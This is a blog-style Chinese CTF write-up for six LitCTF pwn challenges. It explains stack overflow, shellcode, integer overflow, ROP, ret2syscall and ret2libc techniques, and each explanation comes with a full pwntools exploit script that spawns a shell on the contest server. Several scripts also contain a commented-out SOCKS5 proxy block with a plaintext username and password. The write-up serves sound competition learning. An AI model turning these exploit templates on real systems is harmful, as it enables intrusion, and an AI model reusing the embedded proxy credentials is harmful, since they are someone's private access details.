2026第四届LitCTF网络安全挑战赛Pwn的wp

firefly_star2026-05-25 11:53

正宗老代码,0ai添加。

lit_ret2text32

简单的栈溢出,正常溢出覆盖返回地址为后门函数再cat f*。exp如下:

复制代码 
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
flag = 1
if flag:
    p = remote('challenge.cyclens.tech',30826)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
pay=0x3c*b'b'+p32(0x8049213)
sd(pay)
ti()

lit_ret2shellcode

没开NX保护,题目给了栈地址,往栈上写shellcode再栈溢出覆盖返回地址为栈地址即可。exp如下:

复制代码 
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
    p = remote('challenge.cyclens.tech',30496)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
ru(b"Here is a hint for you: buf is at ")
base=i6(rcl().strip())
pay=asm(shellcraft.sh())
pay=pay.ljust(0x78,b'b')+p64(base)
sd(pay)
ti()

lit_integer_overflow

第一次输入是第二次输入的长度,有个检查但是检查了没有退出,跟没检查一样,直接随便输入个长度大于0x48的数,栈溢出覆盖返回地址为后面函数地址再注意一下栈对齐即可。exp如下:

复制代码 
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
    p = remote('challenge.cyclens.tech',30088)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
ru(b"How many bytes do you want to read? (0-63): ")
sl(b'2147483648')
ret=0x4011EC
tar=0x4011D7
pay=0x48*b'b'+p64(ret)+p64(tar)
sd(pay)
ti()

lit_ropchain

普通的栈溢出,给了很多gadget,预期解应该是栈溢出调用read往bss段里写binsh再调用system,我就直接套ret2libc的模板了。libc版本是libc6_2.35-0ubuntu3.13_amd64。exp如下:

复制代码 
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
    p = remote('challenge.cyclens.tech',30763)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
ru(b"Tell me your name: ")
rdi=0x4011b7
ret=0x401233
pu=elf.sym['puts']
put=elf.got['puts']
main=elf.sym['main']
pay=0x48*b'b'+flat(rdi,put,pu,main)
sd(pay)
libcbase=u6(6)-libc.sym['puts']
ph(libcbase)
sy=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search('/bin/sh'))
pay=0x48*b'b'+flat(ret,rdi,binsh,sy)
sd(pay)
ti()

lit_ret2syscall32

跟题目名字一样,32位的ret2syscall。给了控制ebx,ecx,edx的gadget和int 80。不过这个int 80后面不是ret只能用一次,所以先栈溢出调用read往bss里写/bin/sh再返回main。然后再syscall调用execve即可getshell。exp如下:

复制代码 
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='i386'
elf=ELF('./pwn')
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
    p = remote('challenge.cyclens.tech',30559)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
eax=0x80491a6
ecb=0x80491b0
edx=0x80491b6
end=0x80491c1
tar=0x804B3A0
main=elf.sym['main']
read=elf.sym['read']
pay=0x4c*b'b'+flat(read,main,0,tar,0x100)
sd(pay)
sleep(1)
sd(b'/bin/sh\x00')
ru(b"Input: ")
pay=0x4c*b'b'+flat(eax,0xb,ecb,0,tar,edx,0,end)
sd(pay)
ti()

lit_ret2libc

跟那个ropchain差不多,套板子即可。栈溢出返回puts打印puts函数真实地址,进而求出libc基地址,然后通过libc基地址找到system函数与binsh字符串的真实地址。然后返回调用system("/bin/sh")即可,libc版本也是libc6_2.35-0ubuntu3.13_amd64。exp如下:

复制代码 
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
# libc1=cdll.LoadLibrary('./libc.so.6')
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
    p = remote('challenge.cyclens.tech',30763)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
ru(b"Tell me your name: ")
rdi=0x4011b7
ret=0x401233
pu=elf.sym['puts']
put=elf.got['puts']
main=elf.sym['main']
pay=0x48*b'b'+flat(rdi,put,pu,main)
sd(pay)
libcbase=u6(6)-libc.sym['puts']
ph(libcbase)
sy=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search('/bin/sh'))
pay=0x48*b'b'+flat(ret,rdi,binsh,sy)
sd(pay)
ti()

总结

这个比赛还是很简单的,被虐了这么久突然写这么简单的反而不太适应了,exp写的比较慢。不过感觉也差不多,肯定也没ai写exp写的快。

热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04裂开!ChatGPT 居然开始要手机号验证,附详细解决方法05CC-Switch & Claude 基于 Linux 服务器安装使用指南06【AI】2026 年具身智能模型和世界模型总结07Codegraph 实战:用知识图谱让 AI 编程效率翻倍08几个好用的ip纯净度检测网站09Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)10装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?